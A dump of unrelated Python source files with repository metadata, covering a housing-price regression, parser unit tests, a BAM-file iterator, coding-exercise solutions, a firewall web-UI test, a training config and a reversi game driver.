| no_license | MrFiona/MachineLearning | 617387592b51f38e59de64c090f943ecee48bf1a | 7cb49b8d86abfda3bd8b4b187ce03faa69e6302d | refs/heads/master | 2021-05-06T17:18:49.864855 | 2018-01-24T15:29:36 | 2018-01-24T15:29:36 | 111,804,323 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,783 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time : 2017-11-28 15:22
# Author : MrFiona
# File : Poly_linear_regression_boston_house_predict.py
# Software: PyCharm Community Edition
import warnings
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV, ElasticNetCV
from sklearn.linear_model.coordinate_descent import ConvergenceWarning
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures, StandardScaler
names = ['CRIM','ZN', 'INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PTRATIO','B','LSTAT']
def notEmpty(s):
return s != ''
mpl.rcParams[u'font.sans-serif'] = [u'simHei']
mpl.rcParams[u'axes.unicode_minus'] = False
warnings.filterwarnings(action = 'ignore', category=ConvergenceWarning)
np.set_printoptions(linewidth=100, suppress=True)
df = pd.read_csv('../datas/boston_housing.data', header=None)
# print(df.values)
data = np.empty((len(df), 14))
for i, d in enumerate(df.values):
d = list(map(float,list(filter(notEmpty, d[0].split(' ')))))
data[i] = d
x, y = np.split(data, (13,), axis=1)
y = y.ravel()
# print('x:\t', x, type(x))
# print('y:\t', y, type(y))
print ("样本数据量:%d, 特征个数:%d" % x.shape)
print ("target样本数据量:%d" % y.shape[0])
models = [
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', RidgeCV(alphas=np.logspace(-3, 1, 20)))
]),
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', LassoCV(alphas=np.logspace(-3, 1, 20)))
])
]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
parameters = {
"poly__degree": [3,2,1],
"poly__interaction_only": [True, False],
"poly__include_bias": [True, False],
"linear__fit_intercept": [True, False]
}
titles = ['Ridge', 'Lasso']
colors = ['g-', 'b-']
plt.figure(figsize=(16, 8), facecolor='w')
ln_x_test = range(len(x_test))
plt.plot(ln_x_test, y_test, 'r-', lw=2, label=u'真实值')
for t in range(2):
model = GridSearchCV(models[t], param_grid=parameters, n_jobs=1)
model.fit(x_train, y_train)
print("%s算法:最优参数:" % titles[t], model.best_params_)
print("%s算法:R值=%.3f" % (titles[t], model.best_score_))
y_predict = model.predict(x_test)
plt.plot(ln_x_test, y_predict, colors[t], lw=t + 3, label=u'%s算法估计值,$R^2$=%.3f' % (titles[t], model.best_score_))
plt.legend(loc='upper left')
plt.grid(True)
plt.title(u"波士顿房屋价格预测")
plt.show() | [
"[email protected]"
]
| |
79ae6089ad6be6b58d2ffa5c5819cdeffca5037a | 5d6a464bcf381a44588d6a0a475f666bdc8b5f05 | /unittests/namespace_matcher_tester.py | a517fd7da3b64b22821666f82bf8e3b8183eb0f0 | [
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | iMichka/pygccxml | d4f2ac032a742f1cd9c73876f6ba6a85d2047837 | f872d056f477ed2438cd22b422d60dc924469805 | refs/heads/develop | 2023-08-05T04:35:32.774634 | 2017-01-10T06:04:17 | 2017-01-10T06:04:17 | 45,710,813 | 0 | 2 | BSL-1.0 | 2023-08-20T21:02:24 | 2015-11-06T22:14:37 | Python | UTF-8 | Python | false | false | 2,084 | py | # Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import unittest
import parser_test_case
from pygccxml import parser
from pygccxml import declarations
class Test(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
criteria = declarations.namespace_matcher_t(name='bit_fields')
declarations.matcher.get_single(criteria, self.declarations)
self.assertTrue(
str(criteria) == '(decl type==namespace_t) and (name==bit_fields)')
def test_allow_empty(self):
global_ns = declarations.get_global_namespace(self.declarations)
global_ns.init_optimizer()
self.assertTrue(
0 == len(global_ns.namespaces('does not exist', allow_empty=True)))
class unnamed_ns_tester_t(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
declarations.matcher.get_single(
declarations.namespace_matcher_t(name='::'), self.declarations)
def create_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run(create_suite())
if __name__ == "__main__":
run_suite()
| [
"[email protected]"
]
| |
b865747d25a963ea30d051c763b151966b68b592 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex032.py | 146193ba642a281f4a5d647a77ffee5e055d6028 | []
| no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 489 | py | # Ch1Ex032.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 32
# Title: Sort three numbers
def main():
print("Enter numbers: ")
numbers = list(map(int, input().strip().split()))
for i in range(len(numbers) - 1):
for j in range(1, len(numbers)):
if numbers[j - 1] > numbers[j]:
numbers[j - 1], numbers[j] = numbers[j], numbers[j - 1]
print("Sorted: ")
for n in numbers: print(str(n) + " ", end="")
if __name__ == "__main__": main() | [
"[email protected]"
]
| |
11774cab8ab8b849d8287ce7a299505e8750722b | 555377aa073d24896d43d6d20d8f9f588d6c36b8 | /paleomix/common/bamfiles.py | 4b3c6c6f539923c279d04dea982a2307263c0bee | [
"MIT"
]
| permissive | jfy133/paleomix | 0688916c21051bb02b263e983d9b9efbe5af5215 | f7f687f6f69b2faedd247a1d289d28657710a8c2 | refs/heads/master | 2022-11-10T18:37:02.178614 | 2020-06-14T12:24:09 | 2020-06-14T12:24:09 | 270,936,768 | 0 | 0 | MIT | 2020-06-09T07:46:19 | 2020-06-09T07:46:18 | null | UTF-8 | Python | false | false | 4,837 | py | #!/usr/bin/python
#
# Copyright (c) 2012 Mikkel Schubert <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import itertools
# BAM flags as defined in the BAM specification
BAM_SUPPLEMENTARY_ALIGNMENT = 0x800
BAM_PCR_DUPLICATE = 0x400
BAM_QUALITY_CONTROL_FAILED = 0x200
BAM_SECONDARY_ALIGNMENT = 0x100
BAM_IS_LAST_SEGMENT = 0x80
BAM_IS_FIRST_SEGMENT = 0x40
BAM_NEXT_IS_REVERSED = 0x20
BAM_READ_IS_REVERSED = 0x10
BAM_NEXT_IS_UNMAPPED = 0x8
BAM_READ_IS_UNMAPPED = 0x4
BAM_PROPER_SEGMENTS = 0x2
BAM_SEGMENTED = 0x1
# Default filters when processing reads
EXCLUDED_FLAGS = (
BAM_SUPPLEMENTARY_ALIGNMENT
| BAM_PCR_DUPLICATE
| BAM_QUALITY_CONTROL_FAILED
| BAM_SECONDARY_ALIGNMENT
| BAM_READ_IS_UNMAPPED
)
class BAMRegionsIter:
"""Iterates over a BAM file, yield a separate iterator for each contig
in the BAM or region in the list of regions if these are species, which in
turn iterates over individual positions. This allows for the following
pattern when parsing BAM files:
for region in BAMRegionsIter(handle):
# Setup per region
for (position, records) in region:
# Setup per position
...
# Teardown per position
# Teardown per region
The list of regions given to the iterator is expected to be in BED-like
records (see e.g. paleomix.common.bedtools), with these properties:
- contig: Name of the contig in the BED file
- start: 0-based offset for the start of the region
- end: 1-based offset (i.e. past-the-end) of the region
- name: The name of the region
"""
def __init__(self, handle, regions=None, exclude_flags=EXCLUDED_FLAGS):
"""
- handle: BAM file handle (c.f. module 'pysam')
- regions: List of BED-like regions (see above)
"""
self._handle = handle
self._regions = regions
self._excluded = exclude_flags
def __iter__(self):
if self._regions:
for region in self._regions:
records = self._handle.fetch(region.contig, region.start, region.end)
records = self._filter(records)
tid = self._handle.gettid(region.contig)
yield _BAMRegion(tid, records, region.name, region.start, region.end)
else:
def _by_tid(record):
"""Group by reference ID."""
return record.tid
# Save a copy, as these are properties generated upon every access!
names = self._handle.references
lengths = self._handle.lengths
records = self._filter(self._handle)
records = itertools.groupby(records, key=_by_tid)
for (tid, items) in records:
if tid >= 0:
name = names[tid]
length = lengths[tid]
else:
name = length = None
yield _BAMRegion(tid, items, name, 0, length)
def _filter(self, records):
"""Filters records by flags, if 'exclude_flags' is set."""
if self._excluded:
pred = lambda record: not record.flag & self._excluded
return filter(pred, records)
return records
class _BAMRegion:
"""Implements iteration over sites in a BAM file. It is assumed that the
BAM file is sorted, and that the input records are from one contig.
"""
def __init__(self, tid, records, name, start, end):
self._records = records
self.tid = tid
self.name = name
self.start = start
self.end = end
def __iter__(self):
def _by_pos(record):
"""Group by position."""
return record.pos
for group in itertools.groupby(self._records, _by_pos):
yield group
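# Illustrative usage sketch (not part of the original module); it assumes a
# coordinate-sorted BAM file opened with pysam:
#
#     import pysam
#     with pysam.AlignmentFile("example.bam") as handle:
#         for region in BAMRegionsIter(handle):
#             for (position, records) in region:
#                 pass  # per-position processing goes here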
| [
"[email protected]"
]
| |
92ffd6bc7322742b3d8da89f9f43fec5692453de | 4554fcb85e4c8c33a5b5e68ab9f16c580afcab41 | /projecteuler/test_xiaobai_17.py | d9b6678e2bc92bba87fc83a8f6d9bb16ee3c82a9 | []
| no_license | xshen1122/Follow_Huang_Python | 12f4cebd8ddbc241a1c32cfa16288f059b530557 | fcea6d1361aa768fb286e1ef4a22d5c4d0026667 | refs/heads/master | 2021-01-01T04:37:31.081142 | 2017-12-05T07:31:34 | 2017-12-05T07:31:34 | 97,211,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,630 | py | # test_xiaobai_17.py
# coding: utf-8
'''
If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?
'''
def getLetter(yourlist):
ss=''
for item in yourlist:
ss += item
return len(ss)
def getList(yourlist):
for item in one_digit[:-1]:
yourlist.append(yourlist[0]+item)
return yourlist
if __name__ == '__main__':
one_digit = ['one','two','three','four','five','six','seven','eight','nine','ten']
teenage_digit = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']
twenty_digit = ['twenty']
thirty_digit = ['thirty']
forty_digit = ['forty']
fifty_digit = ['fifty']
sixty_digit = ['sixty']
seventy_digit = ['seventy']
eighty_digit = ['eighty']
ninety_digit = ['ninety']
hundred_digit = ['hundredand']
letter_list = []
    letter_list.append(getLetter(one_digit + teenage_digit))  # include 11-19 as well
letter_list.append(getLetter(getList(twenty_digit)))
letter_list.append(getLetter(getList(thirty_digit)))
letter_list.append(getLetter(getList(forty_digit)))
letter_list.append(getLetter(getList(fifty_digit)))
letter_list.append(getLetter(getList(sixty_digit)))
letter_list.append(getLetter(getList(seventy_digit)))
letter_list.append(getLetter(getList(eighty_digit)))
letter_list.append(getLetter(getList(ninety_digit)))
result = 0
for item in letter_list:
result += item
    print result # 1-99 uses 854 letters (787 before the teens were included above)
    # 100 - 199 has ??
    # the remaining ranges (100-199, 200-299, ..., 900-999, and 1000) can be counted the same way
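    # Sketch of how the count could be finished (not executed here): for 100-999
    # each hundreds digit word appears 100 times, "hundred" appears for all 900
    # numbers, "and" only for the 891 numbers with a non-zero remainder, and the
    # 1-99 letter total repeats nine more times; finally add len('onethousand') == 11
    # for 1000. The well-known total for 1 to 1000 is 21124.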
| [
"[email protected]"
]
| |
db8694ebf7d5685301e2ad916517b43690b7ac20 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142881.py | 017398d281b068be2333be366936895d37d5e8d4 | []
| no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142881
# First generate security logs, then delete them
def test_c142881(browser):
try:
login_web(browser, url=dev1)
        # Change the security log filter level to "all"
edit_log_filter_lzy(browser, index="3", all='yes', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes/no', critical='yes/no', emerg='yes/no', alert="yes/no")
        # Add an IP-MAC binding
add_ip_mac_binding_jyl(browser, ip="12.1.1.2", interface=interface_name_2, mac_add="auto_mac")
        # Configure the binding rule
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="enable",
policy_for_undefined_host="alert")
        # Log in to Dev2 and change the IP of interface 2
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.2")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.3', mask='24')
# 82 ping 12.1.1.1
sleep(1)
diag_ping(browser, ipadd="12.1.1.1", interface=interface_name_2)
        # Log in to Dev1
sign_out_jyl(browser)
login_web(browser, url=dev1)
        # Get the total number of security logs; it should not be 0
num2 = get_log_counts_lzy(browser, log_type=安全日志)
print(num2)
        # Delete the security logs
delete_log(browser, log_type=安全日志)
        # Get the total number of security logs; it should now be 0
num1 = get_log_counts_lzy(browser, log_type=安全日志)
print(num1)
        # Get the management log
log1 = get_log(browser, 管理日志)
        # Restore the original configuration
        # Restore the security log filter level to error/critical/emerg/alert
edit_log_filter_lzy(browser, index="3", all='yes/no', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes', critical='yes', emerg='yes', alert="yes")
        # Delete the IP-MAC binding
delete_ip_mac_banding_jyl(browser, ip="12.1.1.2")
        # Restore the IP-MAC binding rule settings
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="disenable",
policy_for_undefined_host="allow")
        # On device 82, change interface 2 back to its original IP
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.3")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.2', mask='24')
try:
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
except Exception as err:
        # If any step above raised an error, reboot the device and restore the configuration
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
]
| |
e917475fabe877dec477e34d78bf01e715efba8c | bcc199a7e71b97af6fbfd916d5a0e537369c04d9 | /leetcode/solved/2568_Minimum_Fuel_Cost_to_Report_to_the_Capital/solution.py | ff61ddbb440902ec03f8f9a1b947035f18fde637 | []
| no_license | sungminoh/algorithms | 9c647e82472905a2c4e505c810b622b734d9d20d | 1389a009a02e90e8700a7a00e0b7f797c129cdf4 | refs/heads/master | 2023-05-01T23:12:53.372060 | 2023-04-24T06:34:12 | 2023-04-24T06:34:12 | 87,406,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,604 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <[email protected]>
#
# Distributed under terms of the MIT license.
"""
There is a tree (i.e., a connected, undirected graph with no cycles) structure country network consisting of n cities numbered from 0 to n - 1 and exactly n - 1 roads. The capital city is city 0. You are given a 2D integer array roads where roads[i] = [ai, bi] denotes that there exists a bidirectional road connecting cities ai and bi.
There is a meeting for the representatives of each city. The meeting is in the capital city.
There is a car in each city. You are given an integer seats that indicates the number of seats in each car.
A representative can use the car in their city to travel or change the car and ride with another representative. The cost of traveling between two cities is one liter of fuel.
Return the minimum number of liters of fuel to reach the capital city.
Example 1:
Input: roads = [[0,1],[0,2],[0,3]], seats = 5
Output: 3
Explanation:
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative2 goes directly to the capital with 1 liter of fuel.
- Representative3 goes directly to the capital with 1 liter of fuel.
It costs 3 liters of fuel at minimum.
It can be proven that 3 is the minimum number of liters of fuel needed.
Example 2:
Input: roads = [[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], seats = 2
Output: 7
Explanation:
- Representative2 goes directly to city 3 with 1 liter of fuel.
- Representative2 and representative3 go together to city 1 with 1 liter of fuel.
- Representative2 and representative3 go together to the capital with 1 liter of fuel.
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative5 goes directly to the capital with 1 liter of fuel.
- Representative6 goes directly to city 4 with 1 liter of fuel.
- Representative4 and representative6 go together to the capital with 1 liter of fuel.
It costs 7 liters of fuel at minimum.
It can be proven that 7 is the minimum number of liters of fuel needed.
Example 3:
Input: roads = [], seats = 1
Output: 0
Explanation: No representatives need to travel to the capital city.
Constraints:
1 <= n <= 105
roads.length == n - 1
roads[i].length == 2
0 <= ai, bi < n
ai != bi
roads represents a valid tree.
1 <= seats <= 105
"""
from typing import List
import pytest
import sys
class Solution:
def minimumFuelCost(self, roads: List[List[int]], seats: int) -> int:
"""Mar 20, 2023 23:06"""
graph = {}
for a, b in roads:
graph.setdefault(a, set()).add(b)
graph.setdefault(b, set()).add(a)
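        # Post-order DFS: each subtree reports (full cars, leftover riders, fuel
        # used so far). Crossing the edge child -> parent costs one liter per
        # full car plus one liter for a partially filled car when riders are
        # left over; leftover riders are then pooled at the parent and packed
        # into cars of `seats` people.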
def dfs(a, parent=None):
if a not in graph:
return 0, 0, 0
cars_total = 0
remainders_total = 1
cost_total = 0
for b in graph[a]:
if b == parent:
continue
cars, remainders, cost = dfs(b, a)
cars_total += cars
remainders_total += remainders
cost_total += cost + cars + min(remainders, 1)
c, r = divmod(remainders_total, seats)
cars_total += c
return cars_total, r, cost_total
return dfs(0)[2]
@pytest.mark.parametrize('args', [
(([[0,1],[0,2],[0,3]], 5, 3)),
(([[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], 2, 7)),
(([], 1, 0)),
])
def test(args):
assert args[-1] == Solution().minimumFuelCost(*args[:-1])
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
| [
"[email protected]"
]
| |
0f6959e8b0cceca7092c8b800527680ba1e71b99 | 2bc8f66fd34ba1b93de82c67954a10f8b300b07e | /general_backbone/configs/image_clf_config.py | 278078f2ccad81f5d77ba37d852e540bba918d42 | []
| no_license | DoDucNhan/general_backbone | 7dabffed5a74e622ba23bf275358ca2d09faddc1 | 686c92ab811221d594816207d86a0b97c9b4bc73 | refs/heads/main | 2023-08-31T14:59:23.873555 | 2021-10-23T06:34:14 | 2021-10-23T06:34:14 | 420,419,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | # Copyright (c) general_backbone. All rights reserved.
# --------------------Config for model training------------------------
train_conf = dict(
# General config
model='resnet18',
epochs=300,
start_epoch=0,
pretrained=True,
num_classes=2,
eval_metric='top1',
# Checkpoint
output='checkpoint/resnet50',
checkpoint_hist=10,
recovery_interval=10,
initial_checkpoint=None,
resume=None,
no_resume_opt=False,
# Logging
log_interval=50,
log_wandb=False,
local_rank=0,
# DataLoader
batch_size=16,
num_workers=8,
prefetch_factor=2,
pin_memory=True,
shuffle=True,
# Learning rate
lr=0.001,
lr_noise_pct=0.67,
lr_noise_std=1.0,
lr_cycle_mul=1.0,
lr_cycle_decay=0.1,
lr_cycle_limit=1.0,
sched='cosin',
min_lr=1e-6,
warmup_lr=0.0001,
warmup_epochs=5,
lr_k_decay=1.0,
decay_epochs=100,
decay_rate=0.1,
patience_epochs=10,
cooldown_epochs=10,
)
test_conf = dict(
# Data Loader
batch_size=16,
shuffle=False,
num_workers=8,
prefetch_factor=2,
pin_memory=True
)
# --------------------Config for Albumentation Transformation
# You can add a new Albumentations transformation class to dict_transform together with its arguments and values.
# To learn about all Albumentations transformations, refer to: https://albumentations.ai/docs/getting_started/transforms_and_targets/
# Note: the order of the keys in the dictionary is the order in which the transformations are applied
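# For example (illustration only): the RandomResizedCrop entry below corresponds to
# constructing albumentations.RandomResizedCrop(width=256, height=256, scale=(0.9, 1.0),
# ratio=(0.9, 1.1), p=0.5) before it is applied to each training image.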
data_root = 'toydata/image_classification'
img_size=224
data_conf=dict(
dict_transform=dict(
RandomResizedCrop={'width':256, 'height':256, 'scale':(0.9, 1.0), 'ratio':(0.9, 1.1), 'p':0.5},
ColorJitter={'brightness':0.35, 'contrast':0.5, 'saturation':0.5, 'hue':0.2, 'always_apply':False, 'p':0.5},
ShiftScaleRotate={'shift_limit':0.05, 'scale_limit':0.05, 'rotate_limit':15, 'p':0.5},
RGBShift={'r_shift_limit': 15, 'g_shift_limit': 15, 'b_shift_limit': 15, 'p': 0.5},
RandomBrightnessContrast={'p': 0.5},
Normalize={'mean':(0.485, 0.456, 0.406), 'std':(0.229, 0.224, 0.225)},
Resize={'height':img_size, 'width': img_size},
ToTensorV2={'always_apply':True}
),
    class_2_idx=None, # Dictionary mapping class names to indices, e.g. {'dog': 0, 'cat': 1}. If None, the folder names are used as labels.
img_size=img_size,
data = dict(
train=dict(
data_dir=data_root,
name_split='train',
is_training=True,
            debug=False, # Set to True if you want to debug the augmentation pipeline
            dir_debug = 'tmp/alb_img_debug', # Directory where augmentation debug images are saved
shuffle=True
),
eval=dict(
data_dir=data_root,
name_split='test',
is_training=False,
shuffle=False
)
)
) | [
"[email protected]"
]
| |
5a380d07f579329852a0e83a874f250f2cbda60c | 1c2c5240222e48cf6ed617378b23ce12c7f69231 | /backend_pms/asgi.py | 3b584ad3f8d2261c6920ecad850891f9d554084d | []
| no_license | MayowaFunmi/pms_backend | 5537d642a76ce18205f4a40a84a52c0ebfb24d5b | 0ddc8a3718bf54dd5f30394ae18c70653634d79f | refs/heads/master | 2023-02-06T23:26:15.429155 | 2021-01-02T14:39:06 | 2021-01-02T14:39:06 | 322,831,233 | 0 | 0 | null | 2021-01-02T13:30:05 | 2020-12-19T11:26:19 | Python | UTF-8 | Python | false | false | 399 | py | """
ASGI config for backend_pms project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend_pms.settings')
application = get_asgi_application()
| [
"[email protected]"
]
| |
bcd47c049189dca5af79f4d85687e6732a673dce | bfe5ab782ca4bb08433d70bdd142913d40a40a8d | /Codes/141) exercise27.py | 57d04640fbaad4771a75ad7ddec47a0b9a69418c | []
| no_license | akshat12000/Python-Run-And-Learn-Series | 533099d110f774f3c322c2922e25fdb1441a6a55 | 34a28d6c29795041a5933bcaff9cce75a256df15 | refs/heads/main | 2023-02-12T19:20:21.007883 | 2021-01-10T05:08:09 | 2021-01-10T05:08:09 | 327,510,362 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | # Create a laptop class with attributes like brand name, model name, price
# Create two instance(object) of your laptop class
class Laptop:
def __init__(self,brand_name,model_name,price):
self.brand_name=brand_name
self.model_name=model_name
self.price=price
        self.full_name=brand_name+' '+model_name # we can create more or fewer instance variables than the parameters passed in
l1=Laptop("HP","Pavilion",50000)
l2=Laptop("Dell","Inspiron",45000)
print(f"Brand Name: {l1.brand_name}, Model Name: {l1.model_name}, Price: {l1.price}, Full Name: {l1.full_name}")
print(f"Brand Name: {l2.brand_name}, Model Name: {l2.model_name}, Price: {l2.price}, Full Name: {l2.full_name}") | [
"[email protected]"
]
| |
6a63db375fbee64f04a063e3e15d6e9caff8ca94 | 0f20f3e02aa05b8e690190a96e92a524b211338f | /SW_Expert_Academy_02/String2.py | 142a9ff2f4c33454b306be6657fae7ebaa14028b | []
| no_license | HYEONAH-SONG/Algorithms | ec744b7e775a52ee0756cd5951185c30b09226d5 | c74ab3ef21a728dcd03459788aab2859560367e6 | refs/heads/master | 2023-07-18T14:41:48.360182 | 2021-09-03T13:41:23 | 2021-09-03T13:41:23 | 336,240,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | # 문장을 구성하는 단어를 역순으로 출력하는 프로그램을 작성하라
sentence = input()
s_list = sentence.split(' ')
s_list.reverse()
for i in s_list:
print(i, end=' ') | [
"[email protected]"
]
| |
3c6efd3975b2933f360fcc57fa1d1394bdbdbcc0 | da8adef15efbdacda32b19196b391f63d5026e3a | /SistemasInteligentes/P4/main.py | e8b16e5345b6a927679fdea2c978a99fee08ce29 | []
| no_license | rubcuadra/MachineLearning | 05da95c1f800e6acbce97f6ca825bd7a41d806a6 | aa13dd007a7954d50586cca6dd413a04db18ef77 | refs/heads/master | 2021-03-19T17:33:14.080691 | 2018-10-19T23:43:27 | 2018-10-19T23:43:27 | 100,544,903 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,237 | py | from reversi_player import Agent
from reversi import ReversiBoard
from random import shuffle
_agent2 = None
def P1Turn(board, player): #Player
move = input('Enter your move: ')
return move
def P2Turn(board, player): #AI
return _agent2.getBestMovement(board, player)
# nivel  => search depth for the AI
# fichas => the computer's tokens: 0 = whites, 1 = blacks
# inicio => who starts: 0 = the computer, 1 = the opponent
def othello(nivel, fichas=1, inicio=1):
global _agent2
    _agent2 = Agent(nivel) #Create the agent for P2
#P2 is the computer
board = ReversiBoard()
print("=== GAME STARTED ===")
print(f"{board.P2S} = Blacks")
print(f"{board.P1S} = Whites\n")
print(board)
#Who starts and set tokens
if inicio == 1:
order = ["P1","P2"]
turns = [P1Turn,P2Turn]
tokens = [board.P2,board.P1] if fichas == 0 else [board.P1,board.P2]
else:
order = ["P2","P1"]
turns = [P2Turn,P1Turn]
tokens = [board.P1,board.P2] if fichas == 0 else [board.P2,board.P1]
while not ReversiBoard.isGameOver(board):
for i in range(2):
P1Score = board.score( board.P1 )
P2Score = board.score( board.P2 )
print("Scores:\t",f"{board.P1S}:{P1Score}","\t",f"{board.P2S}:{P2Score}")
if board.canPlayerMove( tokens[i] ) :
print(f"{order[i]} turn, throwing {board.getSymbol(tokens[i])}")
while True:
move = turns[i]( ReversiBoard( board.value ) ,tokens[i])
if ReversiBoard.cellExists(move):
r = board.throw(tokens[i],move)
if len(r) > 0:
print(f"Selection: {move}")
board.doUpdate(tokens[i],r)
break
print("Wrong movement, try again")
print(board)
if P1Score == P2Score: print("TIE !!")
else: print(f"Winner is {board.P1S if P1Score>P2Score else board.P2S}")
if __name__ == '__main__':
    level = 2 #AI difficulty (search depth)
    npc = 0 #P2 (AI) tokens: 0 = whites
    starts = 1 #0 => P2 (AI) starts
othello(level,npc,starts) | [
"[email protected]"
]
| |
05423c174b31b915d1aa2e5c7e66eff20ca99cb2 | 735f4a6eb4e9c72dc664926ff8b42d02da9067f2 | /batch_four/session-3/simple_file_creation.py | e0e87709ebb33e6df3d688ad5803ce85956fee80 | []
